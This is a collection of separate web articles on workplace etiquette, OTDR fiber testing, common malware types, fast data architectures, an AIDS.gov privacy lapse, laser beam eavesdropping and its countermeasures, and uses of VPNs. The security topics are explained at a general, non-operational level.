ahead or send a message to let colleagues know you are running late. And once you are there remember two important rules of etiquette: do not take a phone call during a meeting; and do not interrupt others. Be punctual. Be polite. Be prepared. Our Interconnected World Increasingly we work in a globalized environment becoming more connected with one another each day in the digitization era. Our colleagues and customers might be anywhere in the world. This opening up of business brings with it all kinds of opportunities to learn and to grow. But it also brings an array of possibilities to get it wrong. It is a very good idea to do some research beforehand if you are traveling to or communicating with business contacts abroad. In most countries a handshake is customary as a business greeting, but in countries like Spain, for instance, it is the norm for men and women to exchange a kiss on the cheek when meeting for the first time – something that would be quite against the rules of etiquette for many countries in the Middle East. Be guided by your own powers of observation, as in any learning process, and if in doubt, ask. With discretion. With respect. Being successful at work comes down to some of the basic rules we learn in grade school. Be respectful, use your words, and be polite. There are many ways to ensure you are successful at work, it is not one simple magic combination.
<urn:uuid:3a9f4361-d0e4-4e30-8193-d438f27a2def>
CC-MAIN-2022-40
https://cn.netacad.com/zh-hant/careers/career-advice/essential-skills/workplace-etiquette-and-your-success
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337432.78/warc/CC-MAIN-20221003200326-20221003230326-00051.warc.gz
en
0.948043
1,089
2.640625
3
Published on January 13, 2010 The Fundamentals of an OTDR To ensure quality of service (QoS), network constructors, service providers and operators need to accurately pinpoint existing and potential problems, making test and measurement equipment vital. There are a number of test tools available that address the different testing needs at various stages of the network, such as fiber commissioning. Used to reveal the total loss, optical return loss (ORL) and the fiber length, such tests can be performed either on a single fiber or on a complete network. Additionally, a closer examination of the different elements that make up the link under test may be required. Whether to characterize each component of the link, to pinpoint a potential problem with the fiber or to find a fault on your network, the use of an optical time domain reflectometer (OTDR) is inevitable—from fiber network commissioning to troubleshooting and maintenance, an OTDR is the tool of choice. This article explores fundamental OTDR principles that are key in understanding the specifications of this instrument. What Is an OTDR? An OTDR combines a laser source and a detector to provide an inside view of the fiber link. The laser source sends a signal into the fiber where the detector receives the light reflected from the different elements of the link. This produces a trace on a graph made in accordance with the signal received, and a post-analysis event table that contains complete information on each network component is then generated. The signal that is sent is a short pulse that carries a certain amount of energy. A clock then precisely calculates the time of flight of the pulse, and time is converted into distance—knowing the properties of this fiber. As the pulse travels along the fiber, a small portion of the pulse’s energy returns back to the detector due to the reflection of the connections and the fiber itself. When the pulse has entirely returned to the detector, another pulse is sent—until the acquisition time is complete. Therefore, many acquisitions will be performed and averaged in a second to provide a clear picture of the link’s components. After the acquisition has been completed, signal processing is performed to calculate the distance, loss and reflection of each event, in addition to calculating the total link length, total link loss, optical return loss (ORL) and fiber attenuation. The main advantage of using an OTDR is the single-ended test—requiring only one operator and instrument to qualify the link or find a fault in a network. Figure #1 illustrates the block diagram of an OTDR. Reflection is Key As previously examined, the OTDR provides a view of the link by reading the level of light that returns from the pulse that was sent. Note that there are two types of light levels: a constant low level created by the fiber called Rayleigh backscattering and a high-reflection peak at the connection points called Fresnel reflection. Rayleigh backscattering is used to calculate the level of attenuation in the fiber as a function of distance (expressed in dB/km), which is shown by a straight slope in an OTDR trace. This phenomenon comes from the natural reflection and absorption of impurities inside optical fiber. When hit, some particles redirect the light in different directions, creating both signal attenuation and backscattering. Higher wavelengths are less attenuated than shorter ones and, therefore, require less power to travel over the same distance in a standard fiber. Figure 2 illustrates Rayleigh backscattering. The second type of reflection used by an OTDR—Fresnel reflection—detects physical events along the link. When the light hits an abrupt change in index of refraction (e.g., from glass to air) a higher amount of light is reflected back, creating Fresnel reflection—which can be thousands of times bigger than the Rayleigh backscattering. Fresnel reflection is identifiable by the spikes in an OTDR trace. Examples of such reflections are connectors, mechanical splices, bulkheads, fiber breaks or opened connectors. Figure 3 illustrates different connections that create Fresnel reflections. What Are Dead Zones? Fresnel reflections lead to an important OTDR specification known as dead zones. There exist two types of dead zones: event and attenuation. Both originate from Fresnel reflections and are expressed in distance (meters) that vary according to the power of those reflections. A dead zone is defined as the length of time during which the detector is temporary blinded by a high amount of reflected light, until it recovers and can read light again—think of when you drive a car at night and you cross another car in the opposite direction; your eyes are blinded for a short period of time. In the OTDR world, time is converted into distance; therefore, more reflection causes the detector to take more time to recover, resulting in a longer dead zone. Most manufacturers will specify dead zones at the shortest available pulse width and on a -45 dB reflection for singlemode fibers and -35 dB for multimode fibers. For this reason, it is important to read the specification sheet footnotes since manufacturers use different testing conditions to measure the dead zones—pay particular attention to the pulse width and the reflection value. For instance, a -55 dB reflection for singlemode fiber provides more optimistic specifications of a shorter dead zone than using -45 dB, simply because -55 dB is a lower reflection and the detector will recover faster. Also, using different methods to calculate the distance could also return a shorter dead zone than what it really is. The Event Dead Zone The event dead zone is the minimum distance after a Fresnel reflection where an OTDR can detect another event. In other words, it is the minimum length of fiber needed between two reflective events. Still using the car example mentioned above, when your eyes are blinded by another car, after a few seconds you could notice an object on the road without being able to properly identify it. In the case of an OTDR, the consecutive event can be detected but the loss cannot be measured (as illustrated in Figure 4). The OTDR merges the consecutive events and returns a global reflection and loss for all merged events. To establish specifications, the most common industry method is to measure the distance at -1.5 dB from each side of the reflective peak (see Figure 5). Another method that measured the distance from the beginning of the event until the reflection level falls to -1.5 dB from its peak has also been used. This method returns a longer dead zone, but it is not often used by manufacturers. Figure 4. Merged event from a long dead zone Figure 5. Measuring event dead zone Attenuation Dead ZonesThe importance of having the shortest-possible event dead zone allows the OTDR to detect closely spaced events in the link. For example, testing in premises networks requires an OTDR with short event dead zones since the patchcords that link the various data centers are extremely short. If the dead zones are too long, some connectors may be missed and will not be identified by the technicians, which makes it harder to locate a potential problem. The attenuation dead zone is the minimum distance after a Fresnel reflection where an OTDR can accurately measure the loss of a consecutive event. Still using the above example, after a longer time, your eyes will have recovered enough to identify and analyze the nature of this possible object on the road. As illustrated in Figure 6, the detector has enough time to recover so that it can detect and measure the loss of the consecutive event. The minimum required distance is measured from the beginning of a reflective event until the reflection is back to 0.5 dB over the fiber’s backscattering level, as illustrated in Figure 7. Figure 6. Attenuation dead zone Figure 7. Measuring attenuation dead zone The Importance of Dead Zones Short attenuation dead zones enable the OTDR not only to detect a consecutive event but also to return the loss of closely spaced events. For instance, the loss of a short patchcord within a network can now be known, which helps technicians have a clear picture of what is inside the link. Dead zones are also influenced by another factor: the pulse width. Specifications use the shortest pulse width in order to provide the shortest dead zones. However, dead zones are not always the same length; they stretch as the pulse width increases. Using the longest possible pulse width results in extremely long dead zones, yet this has a different use, as will be examined further on. The Dynamic Range An important OTDR parameter is the dynamic range. This parameter reveals the maximum optical loss an OTDR can analyze from the backscattering level at the OTDR port down to a specific noise level. In other words, it is the maximum length of fiber that the longest pulse can reach. Therefore, the bigger the dynamic range (in dB), the longer the distance reached. Evidently, the maximum distance varies from one application to another since the loss of the link under test is different. Connectors, splices and splitters are some of the factors that reduce the maximum length of an OTDR. Therefore, averaging for a longer period of time and using the proper distance range is the key to increasing the maximum measurable distance. Most of the dynamic range specifications are given using the longest pulse width at a three-minute averaging time, signal-to-noise ratio (SNR)=1 (averaged level of the root mean square (RMS) noise value). Once again, note that it is important to read the footnotes of a specification for detailed testing conditions. A good rule of thumb is to choose an OTDR that has a dynamic range that is 5 to 8 dB higher than the maximum loss that will be encountered. For example, a singlemode OTDR with a dynamic range of 35 dB has a usable dynamic range of approximately 30 dB. Assuming typical fiber attenuation of 0.20 dB/km at 1550 nm and splices every 2 km (loss of 0.1 dB per splice), a unit such as this one will be able to accurately certify distances of up to 120 km. The maximum distance could be approximately calculated by dividing the attenuation of the fiber to the dynamic range of the OTDR. This helps determine which dynamic range will enable the unit to reach the end of the fiber. Keep in mind that the more loss there is in the network, the more dynamic range will be required. Note that a high dynamic range specified at 20 μs does not guarantee a high dynamic range at short pulses—excessive trace filtration could artificially boost dynamic range at all pulses at the cost of a bad fault-finding resolution (this will be explored in-depth in an upcoming article). What Is Pulse Width? The pulse width is actually the time during which the laser is on. As we know, time is converted into distance so that the pulse width has a length. In an OTDR, the pulse carries the energy required to create the backreflection for link characterization. The shorter the pulse, the less energy it carries and the shorter the distance it travels due to the loss along the link (i.e., attenuation, connectors, splices, etc.). A long pulse carries much more energy for use in extremely long fibers. Figure 8 illustrates the pulse width as a function of time. Figure 8. Short pulse vs. long pulse If the pulse is too short, it loses its energy before the end of fiber, causing the backscattering level to become low to the point where the information is lost at the noise floor level. This results in an inability to reach the end of the fiber. Therefore, it is not possible to measure the complete link since the returned end of fiber distance is much shorter than the actual length of the fiber. Another symptom is when the trace becomes too noisy near the end of fiber. The OTDR can no longer proceed with the signal analysis and the measurements may be faulty. Dealing with Pulse Width When the trace gets noisy, there are two easy ways to obtain a cleaner trace. First, the acquisition time can be increased, which results in a considerable improvement (increase) in SNR, while maintaining the good resolution of the short pulse. However, increasing the averaging time has its limits, as it does not improve SNR indefinitely. If the trace is still not sufficiently smooth, then we move on to the second method, which is to use the next available higher pulse (more energy). However, keep in mind that dead zones extend along with the pulse width. Fortunately, most OTDRs on the market have an Auto mode that selects the appropriate pulse width for the fiber under test. This option can be very convenient when the length or loss of the fiber under test is unknown. When characterizing a network or a fiber, it is mandatory to select the right pulse width for the link under test. Short pulse width, short dead zone and low power are used to test short links where events are closely spaced, while a long pulse width, long dead zone and high power are used to reach further distances for longer networks or high-loss networks. Sampling Resolution and Sampling Points The ability for an OTDR to pinpoint the right distance of an event relies on a combination of different parameters—among them are the sampling resolution and the sampling points. Sampling resolution is defined as “the minimum distance between two consecutive sampling points acquired by the instrument”. This parameter is crucial, as it defines the ultimate distance accuracy and fault-finding capability of the OTDR. Depending on the selected pulse width and distance range, this value could vary from 4 cm up to a few meters. Consequently, there must be a high number of sampling points taken during an acquisition to maintain the best possible resolution. Figure 9a and 9b illustrate the role that high resolution plays in fault-finding. As illustrated above, having a high number of points results in a higher resolution (short distance between points), which is the ultimate condition for fault-finding.Figure 9: Resolution vs. fault-finding efficiency: (a) 5-meter resolution (higher resolution). (b) 15-meter resolution (lower resolution) There are numerous OTDR models available on the market, addressing different test and measurement needs—from basic fault finders to advanced instruments. To make the right choice, fundamental parameters must be considered when purchasing an OTDR, since selecting a unit only based on overall performance and price will lead to problems if the model selected is inappropriate for the application. An OTDR has complex specifications, and most of them entail trade-offs. A solid understanding of these parameters and how to verify them will help buyers make the right choice for their needs—maximizing productivity and cost efficiency. Our next OTDR article will examine other important parameters such as measurement range, linearity and how to measure and compare dynamic range; it will also take an in-depth look at macrobends, as well as the different limitations of the OTDR.
<urn:uuid:7c883107-b20a-457c-ad8c-680cd5eb3879>
CC-MAIN-2022-40
https://www.exfo.com/en/resources/blog/fundamentals-otdr/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337432.78/warc/CC-MAIN-20221003200326-20221003230326-00051.warc.gz
en
0.921137
3,076
3.515625
4
Malware is malicious software that is designed to cause disruption to an IT system, leak private information, or extort the victim in some way. As you can imagine, organizations are very keen to protect their systems from malware attacks due to the costs associated with them. However, given that most malware attacks are the result of human error, there aren’t yet any fool-proof techniques for preventing them. Once a system has been infected with malware, any number of undesirable events can unfold. To make matters worse, some forms of malware operate in a very covert manner and are thus able to go undetected for several months, perhaps even longer. Malware typically arrives in the form of an email attachment, although in some cases the victim will be sent a link to a malicious website, where they will be tricked into downloading/executing a script or handing over their credentials. Anyone can potentially fall victim to a malware attack, including IT professionals, as all it takes is one accidental click. While reports have suggested that some types of malware are on the decline, ransomware, phishing sites, cryptojacking and IoT malware are on the rise. However, it’s worth noting that in the wake of the pandemic there was a surge in the number of malware infections, as cybercriminals saw it as an opportunity to exploit vulnerable employees. As organizations continue to adapt to such changes, their defense against malware attacks will inevitably improve. The Most Common Types of Malware Attacks Adware is a type of malicious software that displays unwanted advertisements on your computer. Although it is relatively harmless, it can be very annoying for the victim, and many adware programs will slow down the victim’s computer. In some cases, the adware will install other malware programs in the background, such as viruses or spyware. A virus is a general form of malware that is designed to infect your system and then spread to other systems. Viruses typically arrive in the form of an email attachment, and once executed, can corrupt, encrypt, steal or delete the files on your system. A worm is a type of malware that is designed to copy itself and spread from one computer to the next, and it can do so without any human interaction. In many cases, the worm script will simply replicate itself in order to deplete a system of its resources. Worms can also modify and delete files, as well as install additional forms of malware onto the system. A trojan derives its name from the legendary “Trojan Horse”, which instead of being a gift, turned out to be malicious. Unlike a virus or a worm, a trojan relies on the user to execute the application and usually arrives via social engineering. Bots are small programs that perform automated tasks, often without the need for human intervention. Bots are often used to perform distributed denial of service attacks (DDoS), which is where the bots are installed on a large number of devices, often without the device owner’s knowledge. Hackers then use these bots to launch a large-scale attack on a given target, which includes flooding the target with traffic in an attempt to cause disruption. Ransomware is arguably the most formidable form of malware, perhaps because it is the most profitable. Once the ransomware script has been executed on the victim’s device, the script will begin encrypting their files. At which point, they will be presented with a message informing them that their files have been encrypted and that they must pay a ransom in order to get their files back. In some cases, the attackers will threaten to publicly release the victim’s files unless a payment is made. Spyware, as the name would suggest, is a form of malware that is designed to spy on its victims. A common use of spyware is to log the keystrokes of the victim or monitor their activity in some way to obtain credentials or some other type of personal information. 8. Fileless Malware Unlike other forms of malware, fileless malware doesn’t rely on files to infect a victim’s device. Instead, it exploits tools that already exist on their devices, such as PowerShell, WMI, Microsoft Office macros, and more. Since fileless malware doesn’t leave a footprint, it is a lot harder to detect.
<urn:uuid:22e1433f-67e6-4aba-9a96-9c48d93689d9>
CC-MAIN-2022-40
https://www.lepide.com/blog/what-is-malware-common-malware-types/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337432.78/warc/CC-MAIN-20221003200326-20221003230326-00051.warc.gz
en
0.957229
922
3.453125
3
“Data is the fuel of this new economy. In fact, I would venture to say that for almost any organization today, after its associates, data is the biggest asset.” — Dev Ganguly, CIO, Jackson National Life Insurance Company (from the Inspired Execution podcast) You won’t get many arguments from CIOs about the importance of data to the modern enterprise. And amid the broad spectrum of data types that power business today, one that keeps rising in importance is fast data. More than three-quarters of modern enterprises use real-time, actionable data for at least some of their applications, according to Forrester Research. In noting fast data’s strategic importance, the analyst firm also highlights the challenges involved with getting the most out of it. In this article, I’ll walk you through what makes fast data unique among other operational data types, and what’s required of enterprises to take full advantage of it. Beyond operational data Data managed by enterprises has historically been categorized into two major buckets: “operational” and “analytical.” Analytical databases—think data warehouses or data lakes—serve to analyze static, historical data to help determine patterns retroactively, understand the past, and attempt to predict the future. Operational data, on the other hand, includes more immediate, transactional data—the data needed to run a business day-to-day, like Inventory and purchase data. As large enterprises increasingly need to rapidly ingest, interact with, and react in real time to data that’s generated by applications at scale and speed, another type of data is emerging: “fast data.” Analysts and other industry observers often lump fast data into the operational bucket—but it has distinct use cases that set it apart from other kinds of operational data. Fast data enables full-circle delivery of data that is “in motion.” In other words, it’s generated and consumed instantly by interactive applications running on large numbers of devices. Fast data enables organizations to act on insights gained from user interactions as these insights are generated at the point of the interaction. And because decisions or actions take place right at the front-end, fast data architectures are, by definition, distributed and real-time. Big versus fast Big data is focused on capturing data, storing it, and processing it periodically in batches. A fast data architecture, on the other hand, processes events in real time. Big data focuses on volume, while with fast data, the emphasis is on velocity. Here’s an example. A credit card company might want to create credit risk models based on demographic data. That’s a big data challenge. A fast data architecture would be required if that credit card company wants to send fraud alerts to customers in real-time, when a suspicious activity occurs in their accounts. Think of FedEx. To track millions of packages and ensure on-time and accurate delivery across the planet, FedEx needs access to the right real-time data to perform real-time analysis and deliver the right interaction—right away, right there, not a day later. The fast data challenge Handling fast data, which pours in from mobile devices, sensor networks, retail systems, and telecommunications call-routing systems, is becoming a major challenge for data-driven organizations. To illustrate the complexity, let’s examine what’s meant by the fast data definition we’ve arrived at: enabling reactive engagement at the point of interaction. - The point of interaction could be a system making an API call, or a mobile app. - Engagement is defined as adding value to the interaction. It could be giving a tracking number to a customer after they place an order, a product recommendation based on a user’s browsing history, or a billing authorization or service upgrade. - Reactive is the fast part of fast data; it means the engagement action happens in hundreds of milliseconds for human interactions (machine-to-machine interactions that occur in an energy utility’s sensor network might not require such a near-real-time response). Fast data requires modern architectures that incorporate a database capable of handling massive, distributed data at speed, high-scale streaming technologies that can deliver events as rapidly as they occur, and logic at the point of interaction to deliver that engagement and value to the end user or end point. Businesses that have built a fast data software stack gain the ability to build applications that can process real-time data and output recommendations, analytics, and decisions in an appropriately quick manner. Regardless of whether it’s seconds or fractions of a second, enterprises need an architecture that can respond in the timeframe demanded by the market. With a fast data architecture in place, organizations also have the ability to shift the way they interact with customers very quickly.This became particularly important once COVID-19 struck. The Home Depot already relied on fast data to keep customers, store employees, and inventory synced. And because the company’s architecture was optimized for app and data velocity, it was able to shift to curbside delivery rapidly and smoothly. The bottom line: Fast data makes it possible to offer a user a “next best action” at the point when a user would find it most helpful—in any experience or business process. Learn how DataStax helps enterprises create modern data applications, built on the world’s most scalable data stack.
<urn:uuid:e056491e-7f37-4d7d-9237-41f0c2bd1de1>
CC-MAIN-2022-40
https://www.cio.com/article/191583/fast-data.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337537.25/warc/CC-MAIN-20221005042446-20221005072446-00051.warc.gz
en
0.91833
1,133
2.53125
3
US Government websites set to help people gain access to information about AIDS have been leaking the data about its users. Anyone visiting AIDS.gov and making use of the search box will probably be concerned to learn that, until the end of last month, data was transmitted in unencrypted form. The Washington Post points out that this data could be very easily intercepted and used to identify an individual. We know that web users are more concerned about privacy than ever before -- and little wonder when authorities say that privacy is not a right. We know that there are various ways in which web activity can be monitored, but it seems that the smartphone app associated with AIDS.gov included this feature as standard -- the app collected and transmitted the latitude and longitude of users, again unencrypted. Following questions from the Washington Post, Miguel Gomez, director of AIDS.gov, said: "We started requiring SSL for the [services] Locator because we understood that information should be encrypted to protect privacy". The Post points out that while encryption has been available "for those who knew how to activate it" since 2013, unencrypted data about people looking for healthcare information has been transmitted since 2010. AIDS.gov is not the only site which has a history of poor security. Another unnamed site which provides help with locating HIV testing centers, only started to encrypt user data this week. The lack of encryption was discovered by security researcher Steve Roosa, who was surprised to learn that a government-run service dealing with sensitive health information handled data so poorly. He found that widgets on the pages - such as Facebook, Twitter and other social elements - could create cookies that snoopers could easily intercept and use to identify individuals. This would be concerning for any website or app, but when dealing with AIDS and HIV which still - sadly - have great stigma attached to them, security is all the more important. Peter Eckersley from privacy advocates Electronic Frontier Foundation said: "We should be exasperated at the lack of security competence of so many branches of our government, when clearly that government does employ a lot of people who understand exactly how cyber-security works and how to break it".
<urn:uuid:198d5a5a-292e-4614-9e4a-1fc2b462d264>
CC-MAIN-2022-40
https://www.itproportal.com/2014/11/10/us-government-let-aids-searchers-privacy/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337537.25/warc/CC-MAIN-20221005042446-20221005072446-00051.warc.gz
en
0.956748
436
2.609375
3
Play audio, or download as a podcast. Back in 1988, newspaper reports about laser beam eavesdropping swept the country. Our clients were scared. To learn exactly how scared they should be, we built a laser beam eavesdropping system and conducted a series of experiments. The following report to clients is the result of those experiments, plus our updated research. —- • —- Eavesdrop from afar, merely by pointing at a window. The idea is alluring to some, horrific to others. News media reports of just such a bugging device, based on laser beam technology, have been circulating for some time now. A litany of claims “…can hear from miles away,” and compound-claims “…through closed windows,” culminates with the coda “No one is safe.” Like the X-Ray vision glasses of comic book fame, laser beam eavesdropping claims tend to be exaggerated. But, like the concept of X-Ray vision, laser listening can be accomplished with the right equipment and conditions. Over a Century Old Invention April 26th, 1880 – Alexander Graham Bell & Sumner Tainter announce their invention – the Photophone. Sound is transmitted on reflected light-rays a distance of 213 meters. They also claim, “it can transmit songs with great purity of tone.” This is the forerunner of CDs, DVDs, fiber optic telephone transmission …and remote eavesdropping. Laser Beam Physics 101 (simplified) Sound is transmitted by vibration. When you speak, you vibrate the air. The air, in turn, vibrates everything it contacts. Certain objects, eg. windows and mirrors, pick up vibrations very easily. When a laser light beam hits such an object, it vibrates also as it reflects and continues its trip. The reflected, vibrating beam can be received; electronically processed; and then listened to. Under controlled conditions, very high quality audio can be recovered. Laser Beam Physics 202 (real world, real problems) Bouncing an invisible laser beam off a window, and attempting to catch the reflection, is a little like playing 3-D billiards – blindfolded. The fun increases exponentially with distance from the target. As if this doesn’t make reception difficult enough… the greater the angle of incidence, the greater the distortion of the received sound. All sound will vibrate a window. This includes interior conversations as well as exterior noises (cars, trucks, birds, etc.). Audio laboratory processing equipment can attenuate this effect, to a degree. We found, if the outside noise is as loud as the conversation indoors audio processing techniques are of marginal assistance. Reflecting a beam from interior room objects helps reduce external sound, however, the beam loses power with each pane of glass it passes through. This reduces effective working distances and increases the number of reflected beams with which one must cope. Thick glass and thermo-pane glass, as used in office buildings, does not conduct sound vibrations as well as thin residential plate glass. Air thermals, dust, wind, fog and rain disrupt laser beams. The greater the beam length, the greater the disruption. Wind blowing through a laser beam, we found, generates noise similar to the cacophony of airplane engines. A laser beam (one powerful enough for professional eavesdropping) is the Neutron Bomb equivalent of a sharp stick in the eye. Both can blind you, but the laser leaves the eye standing. Blinding the subject of a surveillance is not the best way of assuring a continued stream of information while remaining unnoticed. We used safety goggles during our tests. Laser Beam Spying Updates Advancements in signal processing have been made since 1988, however, the physics problems mentioned above remain. Consider trying to use laser eavesdropping in a business environment. Thick, double pane windows (which don’t open). Loud street noises. Few opportunities to face a target window at a right angle. There must be better ways to eavesdrop and spy,” I hear you say. There are. The laser beam is not your worst (or only) enemy. When it comes to your privacy and information security keep your outlook holistic. Don’t overlook age-old espionage techniques – like burglary, sex and blackmail. Laser Beam Spying – Today It is time to update our views on laser beam eavesdropping. While not entirely practical yet as an everyday amateur or business-level spy tool, advancements are being made. Researchers from Bar-Ilan University (Ramat-Gan, Israel) and the Universitat de València (Burjassot, Spain) developed a new way to sense sound remotely using a laser beam. Their research paper is titled: “Simultaneous remote extraction of multiple speech sources and heart beats from secondary speckles pattern” and the authors are: Zeev Zalevsky, Yevgeny Beiderman, Israel Margalit, Shimshon Gingold, Mina Teicher, Vicente Mico, and Javier Garcia. Unlike classic laser beam eavesdropping, the new method does not rely on interferometer or a reflecting diaphragm, like a window. A single laser beam is aimed at the object to be monitored (a person and a cell phone were used in these tests). The speckles that appear in an out-of-focus image of the object are then tracked. This produces data from which a spectrogram or sound signal can be constructed. The setup is basic. The laser illuminates a small area on the object and an ordinary digital camera captures the scene. The camera’s lens is de-focused. This produces a pattern that does not randomly change when the object moves. The camera image is processed, calculating the shift of the pattern from frame to frame. Laser beam audio samples… Note: Audio is labeled as listed in the research paper. However, it sounds like the neck and face audio clips may have been reversed. The Future of Remote Eavesdropping Eavesdropping-from-afar technologies such as: laser beam, microwave, ultra-wideband, ultra-sound and Tempest attacks will get better with age. We don’t discount them. Our clients know this topic has our serious attention and we will continue to keep them informed of new developments – with a realistic perspective. What will the future bring? Interception of brainwaves comes to mind… or, was that something you were thinking just now? Beat the Beam If you still suspect a laser beam eavesdropping attempt is being made against you, fight back… - Hold confidential conversations in a room without windows. - Place a radio against the window and close the drapes, or - Install a white noise generator on the window pane. Of course, do not discuss your suspicions within the target area. Seek out a professional Information Security Consultant / TSCM Specialist for additional assistance. Your problems are more extensive than you think. (v.190104)
<urn:uuid:4ac4c7b4-ac60-4ca1-8099-395da1fd1854>
CC-MAIN-2022-40
https://counterespionage.com/laser-beam-eavesdropping/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337836.93/warc/CC-MAIN-20221006124156-20221006154156-00051.warc.gz
en
0.921609
1,478
2.796875
3
What is a VPN? How is it used? Why is it needed now more than ever before? Read on. Do you want to protect your online identity, stay safe on public wifi or bypass censorship on the internet? Then this article is for you. First a little background on how the internet world works: Your public IP address is discoverable by browsers, websites, service providers, and other devices. This opens the door for your privacy to be compromised. It can also mean that sensitive information falls into malicious hands. When using a VPN, instead of your public IP address being displayed, it uses the address of the VPN server that all of your internet activity is routed through. This VPN server could be located anywhere in the world, which makes it impossible for those interested to find out your true location, let alone any personal information. Moreover, VPNs have lists of countries, after you select one, you appear to be using the internet not from your actual location, but from the location of the virtual server. VPNs secure and protect your online identity. Most of the trusted VPN service providers use the latest encryption keys to hide your data from anyone trying to spy on your digital lifestyle. If servers are not obfuscated, however, your ISP can see if you are using a VPN, but it cannot decipher the contents of your internet traffic. It means your ISP cannot see anything you do while you are connected. The Virtual Private Network (VPN) Market is projected to grow at a CAGR of 6.39% to reach US$50.153 billion by 2024, from US$34.591 billion in 2018. The demand for VPNs will grow on account of the increasing cybercrime issues, as VPNs provide a secure and private network for individuals to access. In addition to this, many online services are acquiring VPN service providers to provide their own VPN services to users. However, since VPNs carry data to a different server before taking the user to the desired webpage, they witness some performance and speed issues, which restrains the demand for these services during the forecasted period. Here is a look at three VPN use cases you should know about. - By Pass Geo Restriction Geo-restriction or geo-blocking is a method to restrict or limit access of specified content based on the user’s geographic location. Average internet users usually encounter geo-restrictions on a daily basis while trying to access streaming platforms as they allow different content for different countries. Additionally, governments implement geo-restriction technologies to block sites or specific online services. How does geo-blocking work? All of your devices on the internet have their unique series of numbers called an Internet Protocol address (known as ‘IP address’). Your laptop, phone, and each device connected to the internet have IPs, which are provided by your internet service provider (ISP). Therefore, your ISP knows your IP address. When you visit a website, the IP address of your network is sent to the server so it knows where it has to send the content. Although your IP address is not significant on its own, using specialized software, it is possible to track your online behavior effortlessly, monitor which websites you visit and when. Also, to some extent, it is possible to know the geographical location of your device. This is how a site ‘knows’ from which country you are accessing. Then, website administrators apply geo-blocking based on this information. Moreover, geo-blocking applies when traveling. Meaning, if you are an American visiting France, you will only access the content available in France. Is bypassing geo-blocking legal? The legality of getting around geo-restrictions is unclear and varies by country. In the European Union, some forms of geo-blocking are illegal. Companies are not allowed to discriminate against consumers based on their location for online sales of specific services. However, streaming platforms, such as Netflix, claim that bypassing geo-blocking can be considered as a violation of copyright and licensing regulations, they also justify the use of methods to detected and block various anonymizer services, like VPNs. There are tools to get around geo-restrictions, VPNs are the most common and, usually, easy to use for a less tech-savvy audience. While using a VPN service, you can quickly change your location and have unrestricted and fast access to any website. You can choose your desired location, or let us offer an optimal choice for you. Local VPN servers represent a private, controlled network. It creates a virtual tunnel, where your data is encrypted so that no one can track or monitor your online activities. VPN masks your actual IP address and allocates you with one from your chosen country. For instance, if you are in the USA, you can quickly select a remote VPN server in Japan, the website will think you are accessing it from Japan. VPNs also help to bypass government-induced censorship. In this case, VPNs not only help to achieve internet freedom but also – to fully secure your data from the prying eyes of snoopers. 2. Avoid Government Censorship Internet censorship is a process of blocking, limiting, filtering or manipulating internet content in any way. It is a method of suppression used by the governments which control what can be accessed, published or viewed online. Although censorship might seem like something done by oppressive governments, the scope of it has been increasing alarmingly in many democratic countries. More than 60 countries engage in some form of state-sponsored censorship. Restrictions and manipulations vary from limiting access to digital content (such as movies, series or music), blocking certain websites or services (Skype, Telegram, WhatsApp, Youtube, Netflix, etc.) or filtering information perceived as unwanted (for instance, opposing the government in any way) Who is usually affected by internet censorship? Various attempts to tighten internet control and crack down online freedom have a harmful impact on journalists, human rights activists, marginalized communities, as well as ordinary internet users, who want to access information or services online. Why do governments engage in various forms of internet censorship? The intents vary. In can be done to spread the government’s views, particular agendas, and to stop government critics and various opposing views. There are a few methods to surf the internet without borders. A VPN (a virtual private network) is a robust tool to access free information online. Also, it is safe, because it hides your online activities from the censors. 3. Stay Safe on Public Wi-fi Public WiFi can be a goldmine for dangerous lurkers posing security threats. It’s convenient, yet, dangerous to use while traveling or dining out in the city. All the traffic within a public WiFi network is usually unsecured, meaning it does not use proper encryption to protect your internet data. Your sensitive information sent via an unsecured WiFi network (such as credit card numbers, passwords, chat messages) becomes an easy target for hackers. When it comes to stealing your data, hackers get quite creative. One of the ways they attack is called man-in-the-middle (MITM). Cybercriminals will create their fake public network. In most cases, the name will be similar to the name of the place with access to a public network (like a restaurant or hotel) nearby. Then, hackers will snoop on your private information and target data on your devices. On top of that, hackers can install packet sniffing software. It is particularly dangerous because it records massive amounts of data which later can be processed on their demand. Be aware that there are many other ways to undermine your privacy while you’re connected to a public WiFi. The internet is full of video tutorials and step-by-step guides on how to hack someone’s computer over a WiFi network. All of the WiFi networks are vulnerable to hacking. If you are not alone using the network, chances are someone is spying on your online activities. At best it is your ISP, at worst – scammers lurking for your passwords, bank account details or other sensitive information. In 2017 Belgian researchers discovered that WPA2 protocol used by the vast majority of WiFi networks is unsafe. According to the report, the WPA2 protocol can be broken using novel attacks potentially exposing personal data. The vulnerability can affect a broad range of operating systems and devices – including Android, Apple, Windows, Linux, OpenBSD, MediaTek, etc. Basically, if you have a device that connects to WiFi, it can be affected. The situation is a little different in the European Union since the General Data Protection Regulation (GDPR) took effect. ISPs processing Europeans’ data must be compliant to the GDPR. They have to make sure they store personal data only with the consent and when it’s not linkable to an individual. What can you do to protect your online identity? It is the best option to shield your private information from cybercriminals. If you are connected to a VPN, your connection is secure even if you’re on a public WiFi hotspot.
<urn:uuid:0431d9ce-a998-4065-82b3-13e5c5c12e5c>
CC-MAIN-2022-40
https://dataconomy.com/2020/02/three-vpn-use-cases-you-should-know-about/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337836.93/warc/CC-MAIN-20221006124156-20221006154156-00051.warc.gz
en
0.933992
1,876
2.796875
3
